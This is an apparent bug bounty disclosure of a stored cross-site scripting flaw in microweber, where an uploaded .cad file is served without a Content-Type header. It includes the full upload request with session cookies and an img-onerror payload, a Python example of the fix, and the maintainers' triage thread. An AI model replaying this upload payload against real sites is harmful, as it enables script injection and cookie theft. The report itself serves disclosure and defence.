Cross-site scripting - Stored via upload ".cad" file in microweber/microweber

Valid

Reported on

Apr 27th 2022


Description

When a user uploads a file whose extension (.cad) is on the whitelist, the server stores the .cad file at userfiles/media/default/, where it can be accessed directly. When this file is requested, the server does not send a Content-Type header, so the browser sniffs the body and treats it as text/html, and any JavaScript inside the file executes.

Proof of Concept

POST /microweber/plupload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------160328176018575625273778825362
Content-Length: 615
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/microweber/admin/content/0/edit
Cookie: laravel_session=VtYsoItyj8nMr4HL6c9jgGhCckyCIvM0KefRFBVP; csrf-token-data=%7B%22value%22%3A%22g3SBhsqNBbpRl3ondmilLAqrPEssVIV9GQCfWH7k%22%2C%22expiry%22%3A1651077488795%7D; lang=en_US; remember_web_59ba36addc2b2f9401580f014c7f58ea4e30989d=1%7CZoRHz4Lp6Dw1kGoNmNjw8Bl9OnQxW9tsICXbPm45GY8PWB1MSkbLXzmWI5cV%7C%242y%2410%242mEkAOazLSPOHDj8x7C8ee06lkvn6Shka.Hdp6wt2g4k.j1maqtBS; back_to_admin=http%3A//127.0.0.1/microweber/admin/content/0/edit; mw-back-to-live-edit=true; show-sidebar-layouts=0
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="name"

xss.cad
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunk"

0
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="chunks"

1
-----------------------------160328176018575625273778825362
Content-Disposition: form-data; name="file"; filename="blob"
Content-Type: application/octet-stream

<img src=x onerror="alert(window.origin)"/>
-----------------------------160328176018575625273778825362--

PoC Image

[Screenshot: Upload .cad file]

[Screenshot: Server does not respond with a Content-Type header]

[Screenshot: Access .cad file and XSS fires]

Impact

This vulnerability allows arbitrary JavaScript execution in the victim's browser, which can be used to steal the user's cookie, perform HTTP requests, read the content of same-origin pages, etc.
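The root cause above is a download route that returns the stored bytes with no Content-Type header, so the browser is left to sniff. The following is an added example (not Microweber's code): a simplified model of that sniffing step, the vulnerable serve behaviour, and a hardened version that sets an explicit type, adds nosniff, and forces a download for allowed-but-not-renderable extensions such as .cad. The allowlist, type map and function names are assumptions.

```python
"""Models the .cad upload issue from the report: a response with no
Content-Type header lets the browser sniff the body and run it as HTML.
Added example, not Microweber's code; the serve functions and the
allowlist below are hypothetical stand-ins for the real download route."""
import os
import re

# Extensions the site accepts for upload, and the type each is served as.
# .cad is deliberately absent from SAFE_INLINE_TYPES: it is allowed for
# upload but has no safe inline rendering, so it must never be rendered.
UPLOAD_ALLOWLIST = {"png", "jpg", "gif", "pdf", "cad"}
SAFE_INLINE_TYPES = {"png": "image/png", "jpg": "image/jpeg",
                     "gif": "image/gif", "pdf": "application/pdf"}

# Simplified model of browser MIME sniffing: with no Content-Type at all,
# a body that starts with a markup tag is treated as text/html.
HTML_START = re.compile(rb"^\s*<(!doctype|html|body|script|img|svg|iframe)",
                        re.IGNORECASE)


def sniffs_as_html(headers: dict, body: bytes) -> bool:
    """True if a browser would render this response as HTML (simplified)."""
    ctype = headers.get("Content-Type", "")
    if ctype.lower().startswith("text/html"):
        return True
    if ctype:  # a declared non-HTML type is not upgraded to HTML
        return False
    return bool(HTML_START.match(body))


def serve_vulnerable(filename: str, body: bytes) -> tuple[dict, bytes]:
    """Behaviour in the report: stored bytes returned with no Content-Type."""
    return {"Content-Length": str(len(body))}, body


def serve_hardened(filename: str, body: bytes) -> tuple[dict, bytes]:
    """Explicit type from the extension, nosniff as defence in depth, and a
    download-only disposition for anything without a known inline type."""
    ext = os.path.splitext(filename)[1].lstrip(".").lower()
    if ext not in UPLOAD_ALLOWLIST:
        raise ValueError(f"extension not allowed: {ext!r}")
    headers = {"Content-Length": str(len(body)),
               "X-Content-Type-Options": "nosniff"}
    if ext in SAFE_INLINE_TYPES:
        headers["Content-Type"] = SAFE_INLINE_TYPES[ext]
    else:
        headers["Content-Type"] = "application/octet-stream"
        headers["Content-Disposition"] = "attachment"
    return headers, body
```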

We are processing your report and will contact the microweber team within 24 hours. a year ago
Peter Ivanov modified the Severity from Critical to Low a year ago
The researcher has received a minor penalty to their credibility for miscalculating the severity: -1
Peter Ivanov validated this vulnerability a year ago
Nhien.IT has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
Peter Ivanov marked this as fixed in 1.2.15 with commit 89c8f5 a year ago
Peter Ivanov has been awarded the fix bounty
This vulnerability will not receive a CVE
Files.php#L1157 has been validated
Nhien.IT
a year ago

Researcher


Hi @maintainer,

Why was this vulnerability reduced to Low severity?

Nhien.IT
a year ago

Researcher


Hi @admin @maintainer,

Can I get a CVE for this report?
